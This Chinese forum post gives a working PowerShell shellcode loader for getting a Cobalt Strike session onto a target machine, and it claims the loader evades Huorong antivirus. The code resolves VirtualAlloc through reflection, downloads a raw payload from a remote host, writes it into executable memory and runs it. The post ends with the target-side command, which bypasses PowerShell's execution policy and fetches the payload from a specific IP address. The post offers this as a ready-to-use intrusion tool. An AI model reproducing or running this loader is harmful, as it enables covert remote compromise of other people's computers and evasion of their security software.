|

楼主 |
发表于 2021-3-3 10:54:34
|
显示全部楼层
本帖最后由 pukr 于 2021-3-3 10:56 编辑
使用加载器远程上线
加载器代码:保存为jzq.ps1,上传至目标机器。火绒未查杀
- function func_get_delegate_type_new {
- Param (
- [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
- [Parameter(Position = 1)] [Type] $var_return_type = [Void]
- )
- $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
- $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
- $var_type_builder.DefineMethod('Inv'+'oke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
- return $var_type_builder.CreateType()
- }
- function func_get_proc_address_new {
- Param ($var_module, $var_procedure)
- $var_unsafe_native_methods = [AppDomain]::CurrentDomain.GetAssemblies()
- $var_unsafe_native_methods_news = ($var_unsafe_native_methods | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
- $var_gpa = $var_unsafe_native_methods_news.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
- return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods_news.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
- }
- If ([IntPtr]::size -eq 8) {
- [Byte[]]$acode = (New-Object Net.WebClient)."Down`l`oadData"($args[0])
- $var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address_new kernel32.dll VirtualAlloc), (func_get_delegate_type_new @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
- $var_buffer = $var_va.Invoke([IntPtr]::Zero, $acode.Length, 0x3000, 0x40)
- [System.Runtime.InteropServices.Marshal]::Copy($acode, 0, $var_buffer, $acode.length)
- $var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type_new @([IntPtr]) ([Void])))
- $var_runme.Invoke([IntPtr]::Zero)
- }
复制代码 然后将cs4.0生成的raw格式的test.bin放在云主机上。
目标机器执行:
- powershell -ExecutionPolicy bypass -File jzq.ps1 http://116.62.49.176:8888/pukr/test.bin
复制代码 cs可正常上线。
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|